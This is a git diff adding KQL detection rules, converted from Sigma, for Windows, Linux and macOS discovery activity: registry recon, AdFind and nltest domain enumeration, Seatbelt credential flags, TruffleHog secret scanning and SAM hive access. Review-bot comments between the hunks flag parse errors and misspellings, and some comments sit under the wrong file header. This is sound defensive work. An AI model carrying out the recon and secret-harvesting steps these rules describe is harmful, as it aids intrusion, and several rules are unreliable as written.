diff --git a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
new file mode 100644
index 00000000..1e81ff0c
--- /dev/null
+++ b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
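Review bot: The regex literal on the `| where` line contains two unescaped double quotes inside a double-quoted KQL string (`(\\s|"|')` twice), which terminates the string at the first `"` and leaves the rest of the line as a syntax error. Escape them in the emitted literal: `| where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|\"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|\"|')"`. Since this rule came from a Sigma `|re` modifier, the converter should escape embedded quotes for every regex it emits rather than relying on the upstream pattern never containing one.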
@@ -0,0 +1,12 @@
+// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.t1007
+// False Positives:
+// - Discord
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
new file mode 100644
index 00000000..edd00674
--- /dev/null
+++ b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql
@@ -0,0 +1,13 @@
+// Title: Potential Container Discovery Via Inodes Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")) and ProcessCommandLine endswith " /" and FolderPath endswith "/ls"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql
new file mode 100644
index 00000000..abd1bb78
--- /dev/null
+++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql
@@ -0,0 +1,10 @@
+// Title: Potential Discovery Activity Using Find - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
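Review bot: In potential_container_discovery_via_inodes_listing.kql the flag test `(ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")` only requires the letters i and d to occur somewhere in the command line, not in the same flag cluster, so any `ls -<flags> ... /` whose arguments happen to contain those letters satisfies it. If the rule is meant for `ls -id /` / `ls -di /`, one regex on the flag cluster is tighter and still readable: `ProcessCommandLine matches regex " -[a-zA-Z]*(i[a-zA-Z]*d|d[a-zA-Z]*i)"`. This looks like a literal rendering of the Sigma `contains|all` list, so the looseness is probably inherited rather than introduced here.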
diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql
new file mode 100644
index 00000000..37b07f74
--- /dev/null
+++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql
@@ -0,0 +1,10 @@
+// Title: Potential Discovery Activity Using Find - MacOS
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql
new file mode 100644
index 00000000..7f254cfd
--- /dev/null
+++ b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Discovery Activity Via Dnscmd.EXE
+// Author: @gott_cyber
+// Date: 2022-07-31
+// Level: medium
+// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution
+// False Positives:
+// - Legitimate administration use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql
new file mode 100644
index 00000000..56d503e2
--- /dev/null
+++ b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql
@@ -0,0 +1,10 @@
+// Title: Potential GobRAT File Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects the use of grep to discover specific files created by the GobRAT malware
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "apached" or ProcessCommandLine contains "frpc" or ProcessCommandLine contains "sshd.sh" or ProcessCommandLine contains "zone.arm") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql
new file mode 100644
index 00000000..803abea3
--- /dev/null
+++ b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Recon Activity Using DriverQuery.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: high
+// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+// - Legitimate usage by some scripts might trigger this as well
+
+DeviceProcessEvents
+| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql
new file mode 100644
index 00000000..48cc0519
--- /dev/null
+++ b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql
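Review bot: `FolderPath endswith "driverquery.exe"` is the only image check in this batch without the leading `\\` path separator, so it also matches any executable whose filename merely ends in that string. For consistency with the sibling rules (`"\\nltest.exe"`, `"\\pktmon.exe"`, etc.) emit `FolderPath endswith "\\driverquery.exe"`. If the upstream Sigma `Image|endswith` value has no backslash, the converter could normalize image suffixes rather than copying them verbatim.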
@@ -0,0 +1,12 @@
+// Title: Potential Recon Activity Via Nltest.EXE
+// Author: Craig Young, oscd.community, Georg Lauenstein
+// Date: 2021-07-24
+// Level: medium
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1482
+// False Positives:
+// - Legitimate administration use but user and host must be investigated
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
new file mode 100644
index 00000000..afcfebbf
--- /dev/null
+++ b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -0,0 +1,12 @@
+// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: blueteamer8699
+// Date: 2022-01-03
+// Level: medium
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
new file mode 100644
index 00000000..7f46bb95
--- /dev/null
+++ b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - AdFind Suspicious Execution
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
+// Date: 2021-02-02
+// Level: high
+// Description: Detects AdFind execution with common flags seen used during attacks
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
+// False Positives:
+// - Legitimate admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/Discovery/pua_adidnsdump_execution.kql
new file mode 100644
index 00000000..79eeabda
--- /dev/null
+++ b/KQL/rules/Discovery/pua_adidnsdump_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Adidnsdump Execution
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
+Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql
new file mode 100644
index 00000000..26f2dee9
--- /dev/null
+++ b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Advanced IP Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+// - Legitimate administrative use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql
new file mode 100644
index 00000000..78716ab9
--- /dev/null
+++ b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql
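Review bot: The continuation line `+Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP` is emitted without the `//` prefix, so in the generated .kql file it is not a comment but a bare statement and the query will not parse as written; the converter appears to prefix only the first line of a multi-line Sigma description. Every continuation line should be written as `// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP` (the inherited typo for "Use" can be corrected at the same time). The same defect appears in the SoftPerfect Netscan, both TruffleHog, Recon Command Output Piped To Findstr, Security Tools Keyword Lookup, Shell Invocation via Apt and Suspicious Group And Account Reconnaissance hunks below.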
@@ -0,0 +1,13 @@
+// Title: PUA - Advanced Port Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects the use of Advanced Port Scanner.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+// - Legitimate administrative use
+// - Tools with similar commandline (very rare)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_crassus_execution.kql b/KQL/rules/Discovery/pua_crassus_execution.kql
new file mode 100644
index 00000000..bf5dfd90
--- /dev/null
+++ b/KQL/rules/Discovery/pua_crassus_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Crassus Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql
new file mode 100644
index 00000000..b700d762
--- /dev/null
+++ b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Nmap/Zenmap Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zennmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zennmap.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_seatbelt_execution.kql b/KQL/rules/Discovery/pua_seatbelt_execution.kql
new file mode 100644
index 00000000..a439ff51
--- /dev/null
+++ b/KQL/rules/Discovery/pua_seatbelt_execution.kql
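Review bot: `"\\zennmap.exe"` in the FolderPath clause and `"zennmap.exe"` in the OriginalFileName list look like a misspelling of the Zenmap binary name; if the shipped executable is `zenmap.exe`, the Zenmap half of this rule never matches and only `nmap.exe` is covered. The description line `Detects usage of namp/zenmap` carries a similar typo. This appears to be inherited from the source rule, so it is worth correcting during conversion rather than only in this generated file: `| where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zenmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zenmap.exe"))`.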
@@ -0,0 +1,12 @@
+// Title: PUA - Seatbelt Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
new file mode 100644
index 00000000..7b58afa9
--- /dev/null
+++ b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - SoftPerfect Netscan Execution
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
+It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
new file mode 100644
index 00000000..99346fc1
--- /dev/null
+++ b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
+// Author: frack113
+// Date: 2021-12-13
+// Level: high
+// Description: Detects active directory enumeration activity using known AdFind CLI flags
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002
+// False Positives:
+// - Authorized administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/Discovery/pua_trufflehog_execution.kql
new file mode 100644
index 00000000..167f98c1
--- /dev/null
+++ b/KQL/rules/Discovery/pua_trufflehog_execution.kql
@@ -0,0 +1,15 @@
+// Title: PUA - TruffleHog Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+// - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\trufflehog.exe" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
new file mode 100644
index 00000000..1ea32800
--- /dev/null
+++ b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
@@ -0,0 +1,15 @@
+// Title: PUA - TruffleHog Execution - Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+// - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "/trufflehog" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/python_initiated_connection.kql b/KQL/rules/Discovery/python_initiated_connection.kql
new file mode 100644
index 00000000..e75ac528
--- /dev/null
+++ b/KQL/rules/Discovery/python_initiated_connection.kql
@@ -0,0 +1,12 @@
+// Title: Python Initiated Connection
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe") and (not(((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1") or (InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install")))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
new file mode 100644
index 00000000..1ca3a7f5
--- /dev/null
+++ b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Recon Command Output Piped To Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-07-06
+// Level: medium
+// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example.
+Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "ipconfig" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "netstat" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "systeminfo" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "tasklist" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")) and (not((ProcessCommandLine contains "cmd.exe /c TASKLIST /V |" and ProcessCommandLine contains "FIND /I" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/renamed_whoami_execution.kql b/KQL/rules/Discovery/renamed_whoami_execution.kql
new file mode 100644
index 00000000..d4781e91
--- /dev/null
+++ b/KQL/rules/Discovery/renamed_whoami_execution.kql
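Review bot: `ProcessCommandLine contains "net"` is a plain substring match, so the second clause fires on any piped `find` whose command line contains `net` anywhere (`netstat`, `dotnet`, `.NET`, `internet`, a URL), which makes the separate `netstat` clause redundant and the rule far noisier than its title suggests. A term match keeps `net user | find`-style invocations while dropping most of that noise: `(ProcessCommandLine has "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")`. The only exclusion is the xampp/catalina case, so an environment baseline is needed before alerting at medium on this one.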
@@ -0,0 +1,10 @@
+// Title: Renamed Whoami Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: critical
+// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql
new file mode 100644
index 00000000..8ee8f789
--- /dev/null
+++ b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql
@@ -0,0 +1,10 @@
+// Title: SAM Registry Hive Handle Request
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handles requested to SAM registry hive
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SAM"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/security_software_discovery_linux.kql b/KQL/rules/Discovery/security_software_discovery_linux.kql
new file mode 100644
index 00000000..d85befda
--- /dev/null
+++ b/KQL/rules/Discovery/security_software_discovery_linux.kql
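Review bot: In the SAM Registry Hive hunk, `DeviceRegistryEvents | where RegistryKey endswith "\\SAM"` does not implement what the title and description promise. As far as I can tell, DeviceRegistryEvents in Defender for Endpoint records key and value creation, modification and deletion (the ActionType column), not handle-open or read access, so a process merely opening the SAM hive — the case the source rule targets through object-access auditing — produces no row, and the rule only fires on the rare modification of a key path ending in `\SAM`. If the handle-request semantics are needed, the rule has to be mapped to a source that logs object access (Security event 4656 where that log is ingested); otherwise the header should state the reduced scope, e.g. `// Description: Detects modification of registry keys under the SAM hive (DeviceRegistryEvents does not record handle requests or reads)`.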
@@ -0,0 +1,12 @@
+// Title: Security Software Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
+// MITRE Tactic: Discovery
